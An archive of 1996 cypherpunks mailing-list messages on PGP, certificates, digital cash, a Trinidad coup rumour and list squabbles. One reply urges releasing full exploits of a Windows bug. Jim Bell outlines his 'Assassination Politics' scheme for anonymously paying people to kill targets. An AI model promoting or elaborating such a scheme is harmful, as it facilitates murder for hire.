>As Microsoft well knows, this is completely untrue. [...]
>
> [...]
>
>Microsoft has not even admitted that this bug in both Windows 95 and
>Windows for Workgroups affects Windows for Workgroups, apparently because
>they have decided not to fix it. 
>
> [...]
>
> We believe that it would be highly irresponsible to release the full
> version of this hack, but we will soon release a crippled
> demonstration-only version 
>
> Is anybody listening?

They will listen if you start to release full uncrippled exploits, after
a reasonable delay.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olbon@dynetics.com (Clay Olbon II)
Date: Tue, 9 Jan 1996 01:36:19 +0800
To: cypherpunks@toad.com
Subject: Key Expiration (was: Revoking Old Lost Keys)
Message-ID: <v01510103ad17023672f6@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Numerous people over that last few days have suggested key expiration dates.
 Viacrypt advertises this for their commercial version of pgp.  Has anyone
used this feature or know how it works (i.e. how does it remain
interoperable with other versions of pgp, or does the expiration feature
only work with other viacrypt users?)

        Clay

- ------------------------------------------------------------------------
Clay Olbon II            | olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: finger olbon@mgr.dynetics.com
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
    "To escape the evil curse, you must quote a bible verse; thou
     shalt not ... Doooh" - Homer (Simpson, not the other one)
- ------------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPFTWAS4mEMx6xUNAQFn+AP+KANJoiLTbbeuqvkHsrnHm1o7vVeXYmXr
9Rjnr6HAuOLL1JJRqd2D2csKC6MaWXkwWbfihdqiPbQJT8MfNwevYBzVVXEmALRI
Ic2uFkESHnHdcht7IVNInCiqlt6Bm17t9ZGlPWSk8aeENaP5bKI3AqJ8AqLROovx
8EK2NHvNPjo=
=VCui
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 9 Jan 1996 09:00:51 +0800
To: Sten Drescher <dreschs@austnsc.tandem.com>
Subject: Re: phone calls from hell
Message-ID: <m0tZOFu-0008xgC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:03 PM 1/8/96 -0600, you wrote:
>jim bell <jimbell@pacifier.com> said:
>
>
>jb> Sorta gives new meaning to the term "_Terminate_ and Stay Resident"
>jb> program, doesn't it?!?
>
>	Wouldn't that be "Stay Resident and Terminate" or "Stay and
>Terminate Resident"?
>
>jb> (Or "end of file.")


"end of life"?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Tue, 9 Jan 1996 03:13:57 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: get mix-installer. (fwd)
In-Reply-To: <199601060236.UAA04326@einstein.ssz.com>
Message-ID: <55ag3ya50k.fsf_-_@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Choate <ravage@ssz.com> said:

JC> Who the fuck elected you reputation monitor. You should chill.

	You did, when you decided to trash Adam in public.

JC> Please refrain from sending any more posts to me privately that are
JC> not directly crypto related. I have better things to do than listen
JC> to your rantings and raving. If Adam and I have a problem then we
JC> will work it out without! your involvment.

	Then you shouldn't have involved the entire mailing list in the
first place.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Tue, 9 Jan 1996 03:20:44 +0800
To: cypherpunks@toad.com
Subject: Re: phone calls from hell
In-Reply-To: <m0tZ0ab-00090OC@pacifier.com>
Message-ID: <5591jia4qo.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3937.1071713533.multipart/signed"

--Boundary..3937.1071713533.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

jim bell <jimbell@pacifier.com> said:


jb> Sorta gives new meaning to the term "_Terminate_ and Stay Resident"
jb> program, doesn't it?!?

	Wouldn't that be "Stay Resident and Terminate" or "Stay and
Terminate Resident"?

jb> (Or "end of file.")



-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Unsolicited email advertisements will be proofread for a US$100 fee.


--Boundary..3937.1071713533.multipart/signed
Content-Type: application/octet-stream; name="pgp00002.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00002.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4yCgpp
UUNWQXdVQk1QRnFobHZCZ1JjZGtHd0ZBUUZvSUFRQWtLcHRHVWo2ZHdzT3ll
Q21ydU12eVVoYmE1WFlTWFFnCkFDbVNnR0xIcVBMUldjRWFqYmtweCt0azlF
ZWMzbFh1NitpNWJTQVpTeUxWZ3k1OWxTcWVuUVFVTXdCb1RsaW4KUW8rSnps
VGpJREZhNSt2TWVrMzFwN0h1N2lNemtxSFlGYklYa2FSTUI3T01zc2JhME93
c2ZPQmJ2dkRzN1NRagp4bDVQbTd0TTVQTT0KPWZqWnAKLS0tLS1FTkQgUEdQ
IE1FU1NBR0UtLS0tLQo=
--Boundary..3937.1071713533.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Vincenzetti <vince@dsi.unimi.it>
Date: Mon, 8 Jan 1996 20:43:59 +0800
To: cypherpunks@toad.com
Subject: (cpx) Re: Why can't I get PGP from MIT (fwd)
Message-ID: <199601081234.AA104254454@idea.sec.dsi.unimi.it>
MIME-Version: 1.0
Content-Type: text


> >I believe I had a problem when I wanted to get PGP coming from
> >internexus.net (New Jersey). I just e-mailed them about it and I think
> >they just added the site to their 'acceptable' list. I did a traceroute
> >to why.net and noticed that it is very close to me, coming off of
> >SprintNet... probably the same situation.
> 
> Internexus.net has been added to the list. The heuristic that the MIT site
> enforces is as follows:
> 
> o To get access you must properly answer some questions regarding export control
>   law and licensing.
> 
> o Your host must have an "inverse" DNS mapping so we can learn its name.
> 
> o Your host's name must end in either ".EDU", ".COM", ".MIL", ".GOV", ".US",
>   or ".CA".
> 
>   *or*
> 
>   Be on our exception list.
> 
> All the ".NET's" and ".ORG's" need to be "excepted."

   *or*

just get it from ftp.dsi.unimi.it!
Use the ftp INDEX command upon being connected.

Most of US's crypto software, in fact, has already been exported to
Europe and is *freely* available at ftp.dsi.unimi.it

Ciao,
David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 9 Jan 1996 09:46:34 +0800
To: dreschs@austnsc.tandem.com
Subject: Re: [NOISE] Re: get mix-installer. (fwd)
In-Reply-To: <55ag3ya50k.fsf_-_@galil.austnsc.tandem.com>
Message-ID: <199601081931.OAA23987@homeport.org>
MIME-Version: 1.0
Content-Type: text


Can we let this die?  I think it was pretty bogus to flame me over a
broken auto-responder, but its not that important.  Lets let it go..

Thank you for not posting on this thread,

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Mon, 8 Jan 1996 12:12:49 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: phone calls from hell
In-Reply-To: <m0tZ0ab-00090OC@pacifier.com>
Message-ID: <199601080355.OAA23848@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

(Maybe I should put [Noise] into the subject, but then again the whole
thread is, isn't it...)
 
...[About exploding phones]...

> Sorta gives new meaning to the term "_Terminate_ and Stay Resident" program, doesn't it?!?
> 
> (Or "end of file.")

This isn't really news...

Haven't you ever heard of the ASCII control character EOU?

Quoting from the Jargon file:

:EOU: /E-O-U/ n. The mnemonic of a mythical ASCII control
   character (End Of User) that would make an ASR-33 Teletype explode
   on receipt.  This construction parodies the numerous obscure
   delimiter and control characters left in ASCII from the days when
   it was associated more with wire-service teletypes than computers
   (e.g., FS, GS, RS, US, EM, SUB, ETX, and esp. EOT).  It is worth
   remembering that ASR-33s were big, noisy mechanical beasts with a
   lot of clattering parts; the notion that one might explode was
   nowhere near as ridiculous as it might seem to someone sitting in
   front of a {tube} or flatscreen today.


This isn't worth signing and I'm tired...

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 9 Jan 1996 07:26:35 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: e$ payee anonymity (Was: e$: Come aaaannnndddd Get it!)
Message-ID: <m0tZQaQ-00095PC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:35 PM 1/7/96 -0500, you wrote:

>Still working through my 10MB cpunks mail backlog; this one's from 
>November 17, 1995:
>
>jim bell writes [msg #0]:
>> It seems to me that this should be possible, within limits, if the potential
>> payee could generate a "blinded" note to be delivered to the payer by
>> anonymous means.  The payer could get the note certified by the bank,
>> possibly given an extra "blind" if necessary  (is this possible? Desirable?
>> Why not?) and then the resulting still-blinded but certified note is posted
>> (in encrypted form, I supposed) to the 'net so that only the payee can
>> decrypt and unblind it.
>
>I wrote:
># This sounds like a version of "Hey, I'll pay you $10, if you give me a ten
># dollar bill first." As I understand your protocol, Bob gives Alice an enote,
># then Alice gives Bob an enote. 
>[...]
>
>jim bell writes [msg #1]:
>> It sounds like you understand even less about the details of digital cash
>> than I do.
>> 
>> First, read the August 1992 issue of Scientific American, the article by
>> David Chaum.  He explains, with a certain amount of detail, how blinded
>> digital cash operates.  To become validated and worth money, it first has to
>> be electronically "written," blinded, and then signed by the bank.  Then it
>> is unblinded, at which point it can be spent.  
>> 
>> What I was saying is that the notes would be written by the payee, then
>> blinded by the payee, given to the payer, and then signed by the payer's
>> bank.  At this point, they are worth money, and they are then returned to
>> the payee, 
>[...]
>
>Aha, thanks for the elaboration. I was confused by your use of the term
>"note" to describe something that isn't in fact worth money, when you said
>"the potential payee could generate a "blinded" note to be delivered to the
>payer". It also helps that I haven't read much of the ecash(tm :) protocol 
>details :}
>
>Futplex <futplex@pseudonym.com>	

I'm quoting the whole thing since it's so old.  As I assume  you are aware, the reason I'm so interested in full payee/full payer anonymity for digital cash is that my idea, "Assassination Politics", requires it:  It is necessary to be able to reward a completely unknown person by a completely unknown person, in such a way that nobody can rat out the other person.  Even the presence of an intermediary (trusted) organization would be unnecessary if it were possible to GUARANTEE the offer of payment to the payee.  

As the idea is currently structured, the central organization collects the money, reports the donations, and makes the (continuing) publicized offer.  It publicizes enough information to prove to the average citizen that it is dealing fairly with all concerned.

Obviously, communication with the donors/guessors must be minimized/secured also, in such a way as to make detection of these people extremely difficult and ideally impossible.  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Tue, 9 Jan 1996 08:21:49 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: PLAYBOY Magazine, Raph Levien & Remailers
In-Reply-To: <199601081743.JAA22884@well.com>
Message-ID: <4cru2d$a1u@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199601081743.JAA22884@well.com>,
Andre Bacard  <abacard@well.com> wrote:
>The current PLAYBOY magazine refers readers to the web site of Raph
>Levien, "The Remailer Guru." Raph's site focuses upon remailers.
> 
Honest!  I buy Playboy for the articles on remailers!  Really!

   - Ian "or not"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 9 Jan 1996 09:00:53 +0800
To: skc@huge.net.hk (Shri)
Subject: Re: [NOISE] [Fwd: Re: ABOI: Desperate User Support]
In-Reply-To: <30F17C73.4765@huge.net.hk>
Message-ID: <199601082050.PAA01206@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Shri writes:
> Seen on Alt.best.of.internet. Would love to find out if this is 
> true! 
[...]
> > >     Origination: alt.sysadmin.recovery
[...]
> > >            Date: 27 Jul 1995 16:44:18 -0700
			  ~~~~~~~~
> > >... (many forwards deleted)...

Please don't post 6-month-old urban net.urban.legends to cypherpunks.
(Do we really need to put that in the Junior Grade Cypherpunks Training
Manual?) 

[...]
> > >Some poor SuperMac TechSport got a call from some middle level official...
> > >from the legitimate government of Trinidad.  The fellow spoke very good
> > >English, and fairly calmly described the problem.
> > 
> > >It seemed there was a coup attempt in progress at that moment.  
[...]

Someone posted this to c'punks a while ago (about 6 months ago, perchance?).

Beyond the fact that it sounds like an UL right off the bat, it's been
pointed out that there haven't been any military coups in Trinidad & Tobago
any time recently (or some similar historical fact). 

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPGC3CnaAKQPVHDZAQHxwAf9ECZ6RVOgkGV+Fw4UWAL6y6nPs1oI45s9
IK25YRUzFPGH+iFkvXCvV9qwAR/pDec/i/V92+hoz7dJK0oyv37vbBgIDVvULhuK
cH1NMLMUTyzBFJ6wa73+4JR7yAg8CmtgdghWpltvI+yczbOM9+rLA3zHFYfSbtET
dB6jds4nnMu4pvSP+FZAoLKP2Wuy5Xl2IRMhWm9vpRfJoiTSatef1JH+Vt8hQVQm
f06XtiPoqNSV3S97t79jyibYB9XLkH0shlPAnmu5li+1VW2HrnakRCAFVpSZnbxV
Af5uCpdWTKtcDyWjo4h1ohWwoJxj3yrLMyz+21zRxLfuy1gPgBWKag==
=POUz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 9 Jan 1996 09:01:15 +0800
To: greeeeaaaaat* <root@bushing.plastic.crosslink.net>
Subject: Re: [Fwd: Re: ABOI: Desperate User Support]
In-Reply-To: <199601081852.SAA03871@bushing.plastic.crosslink.net>
Message-ID: <Pine.ULT.3.91.960108164337.24082A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 8 Jan 1996, greeeeaaaaat* wrote:

> It's not.  This was hashed over in alt.folklore.computers a little
> while back, and someone did some research and found out that there
> haven't been any coup attempts in the past few years in Trinidad, or
> something like that.

Someone did very poor research, then. In fact there was a Libyan-backed
coup two or three years ago, which was overthrown in about a month. I
distinctly remember the headline in The Economist, which was similar to
"Trinidad Coup Not Considered Cricket." 

Info on the coup and a copy of this bit of folklore is on a Trinidad & 
Tobago Web Page somewhere. Maybe they got a definitive answer in the 
six months or so since I last looked.

This should probably get a [NOISE] for Perry's benefit...

-rich
 owner-win95netbugs@lists.stanford.edu
 ftp://ftp.stanford.edu/pub/mailing-lists/win95netbugs/
 gopher://quixote.stanford.edu/1m/win95netbugs
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Tue, 9 Jan 1996 10:48:22 +0800
To: iang@cs.berkeley.edu
Subject: [NOISE] Re: PLAYBOY Magazine, Raph Levien & Remailers
In-Reply-To: <199601081743.JAA22884@well.com>
Message-ID: <j+b8w8m9LwBI085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <4cru2d$a1u@calum.csclub.uwaterloo.ca>,
iagoldbe@csclub.uwaterloo.ca (Ian Goldberg) wrote:

> In article <199601081743.JAA22884@well.com>,
> Andre Bacard  <abacard@well.com> wrote:
> >The current PLAYBOY magazine refers readers to the web site of Raph
> >Levien, "The Remailer Guru." Raph's site focuses upon remailers.
> > 
> Honest!  I buy Playboy for the articles on remailers!  Really!
> 
>    - Ian "or not"

I haven't bought an issue of PLAYBOY for years.  Nowadays, I get all of
my naked lady pictures from the Internet.

Alan "I use them to practice LSB steganography with" Bostick

-- 
   Alan Bostick             | He played the king as if afraid someone else 
Seeking opportunity to      | would play the ace.
develop multimedia content. |      John Mason Brown, drama critic
Finger abostick@netcom.com for more info and PGP public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 9 Jan 1996 06:39:02 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Certificates: limiting your liability with reuse limitations
Message-ID: <Pine.SUN.3.91.960108172534.14719h-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Suppose I am a CA.  I am worried that by issuing a certificate with a 
lifespan of more than 2 milliseconds I am opening myself up to unlimited 
liability if for some reason, despite my best efforts, I issue an 
erroneous certificate.

I know I can write disclaimers, but that's not reliable since courts 
often ignore them, and anyway it scares off customers.

I know I can put an expiration date on the certificate, but that's not 
enough.  I can accumulate a lot of exposure in a few seconds, much less 
weeks.

I know I can put a reliance limit in the X.509 ver 3 certificate, but 
that's not enough.  Even a $1 limit could be used many millions of times.

Is it feasabile to say: Can only be relied on once per day/week/month?  
Is this something the relying parties can reasonably be expected to monitor?

It seems to me that this sort of a limit is essential if a CA is to feel 
comfortable outside Utah....

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 9 Jan 1996 06:52:01 +0800
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: phone calls from hell
In-Reply-To: <Pine.SOL.3.91.960107130431.12839B-100000@use.usit.net>
Message-ID: <Pine.SV4.3.91.960108171909.4373B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I almost hate to start a thread about something that will inevitably 
implode into a middle-east-politics flamefest, but this reminds me of the 
time the newswires reported that 10% of Israel's population had attended 
that peace rally in Tel-Aviv. Was it right after the Sabra-Shatilla massacre?
Anyway, the followup news (which of course never made the news) was that 
it would not be physically possible for a third of that many people to 
all be in that place (Kikar Square?) all at once.  The original numbers 
were published by the Israeli "peace camp", who would have liked for 
there to be that many people there.

100,000 people at a funeral?  I don't doubt that there were 100,000 
people who would have liked to be there, but I am skeptical 
that there's enough vehicles in Gaza to assemble 100,000 people  to a 
funeral within a few hours.

It doesn't matter does it?  Everyone is willing to lie when they write 
press releases; newspapers are willing to not check ridiculous claims (if 
the claim comports with the publisher's outlook); and setting the record 
straight doesn't help sell advertising, publishers really care how lazy 
journalists are.

I saw a great interview with the man who invented the phrase "ethnic 
cleansing" - a PR-agency guy in Boston under contract to the Bosnian 
Government. He openly stated, that he doesn't get paid to write the 
truth into press releases; he's paid to get his client's press releases 
into opinion-molder's fax machines FIRST. The first press release always 
wins. He also openly stated that he didn't know and didn't care if the 
Bosnian-Serb militias were operating concentration camps or not; the 
important thing was to fax the story to the American Jewish groups; he 
knew that the very *word* concentration camp would catch their eye and 
push them into agitating against the Serbs. He specifically stated, 
that he was so proud of his cleverness, because the Croatian President 
(foe of the Serbs) has a book under his belt ("Wastelands of Historical 
Reality") that is packed full of some very hot anti-Semetism.

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 9 Jan 1996 10:04:37 +0800
To: futplex@pseudonym.com>
Subject: Still [NOISE] but a.f.urban was clearly wrong [Fwd: Re: ABOI: Desperate User Support])
In-Reply-To: <199601082050.PAA01206@thor.cs.umass.edu>
Message-ID: <Pine.ULT.3.91.960108172827.24082E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


You should know better than to believe everything you read in
alt.folklore.urban, even the debunking. 

There was a brief Libyan-backed coup in Trinidad & Tobago in July 1990.
Here are a few Reuters headlines in reverse chronological order, courtesy
of Lexis/Nexis. I also recall a couple of excellent articles in The
Economist.

I believe that the Symantec story has at least some truth to it. 

I don't read alt.folklore.urban, so I won't post there, but someone should.

-rich


                             Copyright 1991 Reuters

                        April 9, 1991, Tuesday, AM cycle

LENGTH: 167 words

HEADLINE:  TRINIDAD COUP  HEARING POSTPONED AFTER NOISY COURTROOM PROTESTS

DATELINE: PORT OF SPAIN, Trinidad

 BODY:
   A pretrial hearing for 18 of the alleged plotters in the July 1990  
Trinidad 
 coup  attempt was postponed Tuesday because of noisy courtroom protests.

   Members of the black Moslem Jamaat al Muslimeen group chanted and 
banged ...



                             Copyright 1990 Reuters

                       October 2, 1990, Tuesday, BC cycle

LENGTH: 3422 words

HEADLINE: WORLD NEWS EVENTS SCHEDULED DURING THE NEXT FOUR WEEKS

 BODY:
   ... visits (until Oct. 10).

   NASHVILLE Country Music Association annual awards.

   PORT-OF-SPAIN Expected starting date of  Trinidad coup  plotters trial.

   STOCKHOLM Nobel Prize for Medicine announced.

   STRASBOURG, France European Parliament plenary session (until ...

   ... visits (until Oct. 10).



                             Copyright 1990 Reuters

                     September 13, 1990, Thursday, AM cycle

LENGTH: 371 words

HEADLINE:  TRINIDAD COUP  PLOTTERS FACE TRIAL

BYLINE: By Lindsay MacKoon

DATELINE: PORT OF SPAIN, Trinidad



                             Copyright 1990 Reuters

                      August 23, 1990, Thursday, AM cycle

LENGTH: 184 words

HEADLINE:  TRINIDAD COUP  HEARING DELAYED OVER SECURITY CONCERNS

DATELINE: PORT OF SPAIN, Trinidad



                             Copyright 1990 Reuters

                      August 15, 1990, Wednesday, AM cycle

LENGTH: 387 words

HEADLINE: TRIAL OF TRINIDAD MOSLEM REBELS COULD BEGIN NEXT WEEK

BYLINE: By Lindsay MacKoon

DATELINE: PORT OF SPAIN, Trinidad

 BODY:
   ... 1 and transferred to Trinidad's state prison under heavy security.

   Caribbean nations, worried about the economic conditions that 
contributed to 
the  Trinidad coup  attempt, plan to hold a meeting to discuss ways of 
improving
regional security. Barbados Prime Minister Erskine Sandiford ...



                             Copyright 1990 Reuters

                        July 31, 1990, Tuesday, AM cycle

LENGTH: 496 words

HEADLINE: ANY FLIGHT WILL DO FOR THOUSANDS THRONGING TRINIDAD AIRPORT

BYLINE: By Peter Zollman

DATELINE: PORT OF SPAIN, Trinidad

 BODY:
   Thousands of sweaty tourists and business people trying to flee the 
chaos of 
the  Trinidad coup  attempt jammed Piarco International Airport Tuesday,
jostling and shoving to get on any available flight out of the island.



                             Copyright 1990 Reuters

                        July 30, 1990, Monday, AM cycle

LENGTH: 96 words

HEADLINE: AGREEMENT TO END  TRINIDAD COUP  ATTEMPT BREAKS DOWN

BYLINE: By Peter Zollman

DATELINE: PORT OF SPAIN, Trinidad



                             Copyright 1990 Reuters

                        July 29, 1990, Sunday, AM cycle

LENGTH: 507 words

HEADLINE: MORE THAN 300 WOUNDED IN  TRINIDAD COUP  AS TALKS BOG DOWN

BYLINE: By Peter Zollman

DATELINE: PORT-OF-SPAIN, Trinidad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 9 Jan 1996 07:22:17 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Certificates: limiting your liability with reuse limitations
In-Reply-To: <Pine.SUN.3.91.960108172534.14719h-100000@viper.law.miami.edu>
Message-ID: <199601082310.SAA27803@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A. Michael Froomkin writes:
> I know I can put an expiration date on the certificate, but that's not 
> enough.  I can accumulate a lot of exposure in a few seconds, much less 
> weeks.
> 
> I know I can put a reliance limit in the X.509 ver 3 certificate, but 
> that's not enough.  Even a $1 limit could be used many millions of times.
> 
> Is it feasabile to say: Can only be relied on once per day/week/month?  

This sounds like it would present the same exposure problems as an expiration
date, but perhaps be more difficult to impose. As you said above, you can
assume huge liability in a few seconds, even if you're only given a few
seconds a week. Also, I don't immediately see a way to arrange this on the
technical side that doesn't reduce to using something that expires and
replacing/refreshing it periodically. Of course, the net is in some ways
excellent for that sort of application.

How about combining value limits with time limits ?  Over the wire, using
low value limits and replacing them frequently might be a workable solution.

> Is this something the relying parties can reasonably be expected to monitor?

This sounds like a legal question, so I don't think I can offer a useful 
response. 

Futplex <futplex@pseudonym.com>       "I think every player in the NFL should 
	    	have to go through grad school. It would be a great humbler." 
	    -Matt Miller, Cleveland Browns 1979-1983, Ph.D. Georgia Tech 1993

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPGj8SnaAKQPVHDZAQG/NQf/V5toCNRKaSZjVwACN663gWbq0rysZq3r
7d/XKAZHCUWoaYWS4RkaF101/0t7jEAww+wggrl02MNximN7Ku/CM1sJkDT/Ixzm
KCAQwl96ov3UgBYkol66ubciHRmX897NszCwqEgoc/pcOq2rLvhjskUZXt0WHhU7
U10/00/Zg86kAsCo3xUAB3ci4t9Pk2YJigg5n23vJfuN3j0BpKcGW9B7McP9fm59
V8bBp1CDF3Ey5XwPaaNkwmuYlT7QVyDlEOYu0EppzvQdT2PyXT8B9cAjGR5PO8IJ
xUIkxmXmfPlRxjJVUTSfvf3gKJnK1ax09sPDwNiA6/JAtHXPTo5llw==
=rHvs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 9 Jan 1996 07:23:12 +0800
To: cypherpunks@toad.com
Subject: The LOGIC of Navigator 2.0 ?
Message-ID: <Pine.BSD.3.91.960108181040.25949F-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
  01 07 96 the business news agency Bloomberg reports: 
 
    Netscape Communications Corp. said it will release in two 
    weeks a new version of its popular browsing software, de- 
    signed to keep the Internet software company ahead of rival 
    Microsoft Corp. 
                              ... 
 
    The [new] browser can use programs that are stored on cen- 
    tral computers on the Internet, making a personal computer's 
    operating system less important. 
 
 
  And thereby making GOVERNMENT LOGIC more important? 
 
 
  Cordially, 
 
  Jim 
 
 
 
 
  NOTE: The newsstory's headline?  NETSCAPE WILL RELEASE AN 
  UPDATED INTERNET BROWSER IN TWO WEEKS.  Its dateline? 
  MOUNTAIN VIEW, Calif. (Jan 7, 1996 4:16 p.m. EST).  Its 
  Nando News online filename?  biz7_1087.html 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 9 Jan 1996 10:27:03 +0800
To: cypherpunks@toad.com
Subject: Re: NSA Rigs Win NT to B
In-Reply-To: <199601090127.CAA14816@utopia.hacktic.nl>
Message-ID: <Pine.ULT.3.91.960108180923.24578B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jan 1996, Anonymous wrote:

> including Top Secret.  Windows NT was originally designed
> with security in mind.  A NSA evaluation team has
> determined that Windows NT 3.5 with Service Pack 3
> satisfies all class C-2 security requirements.  B-level
> of security strengthens the C2 level security features
> while providing stricter system assurances.

This is misleading at best. Windows NT is certified C2 as a standalone
workstation only. It has not been tested or certified for networked
environments. The fact that NT lets you know when you have attempted a
login as a user does not exist, without asking for a password, would
clearly disqualify NT Server from a C2 rating in a network environment, 
at least when NetWare services are used. 

Real NetWare servers do qualify for a C2 rating. 

-rich
 owner-win95netbugs@lists.stanford.edu
 ftp://ftp.stanford.edu/pub/mailing-lists/win95netbugs/
 gopher://quixote.stanford.edu/1m/win95netbugs
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 9 Jan 1996 07:42:46 +0800
To: cypherpunks@toad.com
Subject: Re: Certificates: limiting your liability with reuse limitations
In-Reply-To: <199601082310.SAA27803@thor.cs.umass.edu>
Message-ID: <199601082339.SAA27242@homeport.org>
MIME-Version: 1.0
Content-Type: text


A. Michael Froomkin writes:
> I know I can put an expiration date on the certificate, but that's not
> enough.  I can accumulate a lot of exposure in a few seconds, much less
> weeks.
>
> I know I can put a reliance limit in the X.509 ver 3 certificate, but
> that's not enough.  Even a $1 limit could be used many millions of times.
>
> Is it feasabile to say: Can only be relied on once per day/week/month?

	Undeniable digital signatures.  They're not 'undeniable'
differently from normal digital signatures, but they do require the
cooperation of the signer to confirm the signature.  Thus, a KCA could
decide only to verify a signature 50 times, or once per day (or once
per being paid the $10 signature verification fee.)

	Schneier has a decent amount on undeniable digital signatures.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: greeeeaaaaat* <root@bushing.plastic.crosslink.net>
Date: Tue, 9 Jan 1996 08:14:47 +0800
To: skc@huge.net.hk (Shri)
Subject: Re: [Fwd: Re: ABOI: Desperate User Support]
In-Reply-To: <30F17C73.4765@huge.net.hk>
